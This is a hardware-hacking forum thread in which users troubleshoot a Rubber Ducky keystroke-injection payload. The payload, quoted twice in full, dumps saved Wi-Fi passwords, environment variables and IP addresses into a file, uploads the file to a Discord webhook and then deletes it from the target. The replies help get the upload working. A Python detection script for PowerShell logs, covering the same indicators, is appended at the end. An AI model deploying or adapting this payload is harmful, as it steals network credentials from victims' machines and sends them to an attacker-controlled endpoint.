Emilio5639 Posted August 19, 2022

I was trying to run the Discord Windows Wifi on my new MK II Rubber Ducky, and when I generated the inject.bin I get the powershell to show up, but the Payload never sends the command to powershell. The window stays open and I can see another command line as if the enter key was sent, but not the string. I went through and tried it manually, and it sends the webhook to discord when I cut and paste in PS, but now with the ducky. Might be an issue with the Payload Studio.

REM Title: Discord Windows Wifi IP-Info
REM Description: Grabs wifi passwords, environment data, IPv4 Network addresses, writes to a file, uploads it to Discord, then cleans up the file on the targets filesystem and exits.
REM Author: Startrk1995
REM Props: Hak5 Team
REM Version: 1.0
REM Category: Exfiltration
REM Target: Windows 10 (CMD + Powershell)
REM Attackmodes: HID
REM Mandatory Info: Add your Discord Webhook URL in quotes with no spaces and with permission to post.
REM Discord URL: Example: https://discord.com/api/webhooks/123456789012345678/adjlfjlejlidsjasdlijflie_ajsdflkjaljeiljkdajlkjd
REM Legal: This script is for educational purposes only please do not use this for malicious purposes
DELAY 500
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 1000
REM I have this as all one command for quickness.
STRING $url="https://discord.com/api/webhooks/REMOVEDFROMPOST";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@stats.txt" $url ; Remove-Item '.\stats.txt';exit
ENTER

Thanks again,
Emilio

dark_pyrro Posted August 21, 2022

I guess you got some guidance about this on Discord

Korben Posted August 26, 2022

PayloadStudio 1.1.0 is out and likely addresses the issues you encountered.

Mork Posted September 7, 2022

On 8/20/2022 at 1:48 AM, Emilio5639 said:

> I was trying to run the Discord Windows Wifi on my new MK II Rubber Ducky, and when I generated the inject.bin I get the powershell to show up, but the payload never sends the command to powershell. The window stays open and I can see another command line as if the enter key was sent, but not the string. I went through and tried it manually, and it sends the webhook to Discord when I cut and paste in PS, but now with the ducky. Might be an issue with Payload Studio.
>
> REM Title: Discord Windows Wifi IP-Info
> REM Description: Grabs wifi passwords, environment data, IPv4 network addresses, writes to a file, uploads it to Discord, then cleans up the file on the target filesystem and exits.
> REM Author: Startrk1995
> REM Props: Hak5 Team
> REM Version: 1.0
> REM Category: Exfiltration
> REM Target: Windows 10 (CMD + Powershell)
> REM Attackmodes: HID
> REM Mandatory Info: Add your Discord webhook URL in quotes with no spaces and with permission to post.
> REM Discord URL: Example: https://discord.com/api/webhooks/123456789012345678/adjlfjlejlidsjasdlijflie_ajsdflkjaljeiljkdajlkjd
> REM Legal: This script is for educational purposes only, please do not use it for malicious purposes
> DELAY 500
> GUI r
> DELAY 200
> STRING powershell
> ENTER
> DELAY 1000
> REM I have this as a single command for quickness.
> STRING $url="https://discord.com/api/webhooks/REMOVEFROMPOST";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Schlüsselinhalt\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@stats.txt" $url ; Remove-Item '.\stats.txt';exit
> ENTER
>
> Thanks again,
> Emilio

Hi, I'm currently trying to transfer data to Discord and found that the command curl.exe -F "file1=@stats.txt" $url; is not working. The "-F" parameter doesn't seem to exist. How exactly did you solve the problem? I would also like to transfer a text file to Discord, but I haven't been able to fix the problem yet. I've also tried to encode it with Base64 and pass it as a single-line variable (string). Unfortunately, it is usually over 2000 characters. Do you have a solution for me? Thanks in advance!

dark_pyrro Posted September 7, 2022

Not sure if you got the answer on Discord, but if the "true" curl binary hasn't been installed on the Windows system, it's simply an alias for Invoke-WebRequest so you can probably not expect it to work as the real curl command in every aspect.
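
For defenders: the command chain quoted in this thread is visible in PowerShell script block logs (event ID 4104) and can be matched there. The following is an added example, not part of any post in this thread; the sample log text is constructed, and the function names, indicator names and severity levels are assumptions.

```python
import re

# Indicators derived from the payload quoted in this thread.
INDICATORS = {
    "wifi_key_dump": re.compile(
        r"netsh\s+wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear", re.I | re.S),
    # discordapp.com is Discord's legacy domain (not mentioned on the page).
    "discord_webhook": re.compile(
        r"https://discord(?:app)?\.com/api/webhooks/[^\s\"';]+", re.I),
    "curl_file_upload": re.compile(
        r"\bcurl(?:\.exe)?\s+.*-F\s+[\"']?\w+=@", re.I | re.S),
    "cleanup": re.compile(r"\bRemove-Item\b", re.I),
}

def redact(text):
    """Keep the webhook ID but drop the secret token so alerts do not leak it."""
    return re.sub(r"(/api/webhooks/\d+/)[^\s\"';]+", r"\1<redacted>", text)

def score_script_block(text):
    """Return (severity, matched indicator names) for one ScriptBlockText."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    collects = "wifi_key_dump" in hits
    exfil = "discord_webhook" in hits or "curl_file_upload" in hits
    if collects and exfil:
        return "high", hits      # key dump and upload in the same block
    if collects or "discord_webhook" in hits:
        return "medium", hits    # one half of the chain; needs context
    return "none", hits

# Constructed samples (hypothetical log text, placeholder webhook token).
SAMPLES = [
    r'''$url="https://discord.com/api/webhooks/123456789012345678/EXAMPLETOKEN";'''
    r'''(netsh wlan show profiles) | %{(netsh wlan show profile name="$name" '''
    r'''key=clear)} >> stats.txt;curl.exe -F "file1=@stats.txt" $url ; '''
    r'''Remove-Item '.\stats.txt';exit''',
    r"netsh wlan show profiles",
    r'Invoke-RestMethod -Uri "https://discord.com/api/webhooks/1/EXAMPLETOKEN" -Method Post',
    r'netsh wlan show profile name="Office" key=clear',
]

def triage(samples):
    """Return redacted (severity, hits, text) alerts for samples above 'none'."""
    scored = [(score_script_block(t), t) for t in samples]
    return [(sev, hits, redact(t)) for (sev, hits), t in scored if sev != "none"]

if __name__ == "__main__":
    for alert in triage(SAMPLES):
        print(alert)
```
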
Archived
This topic is now archived and is closed to further replies.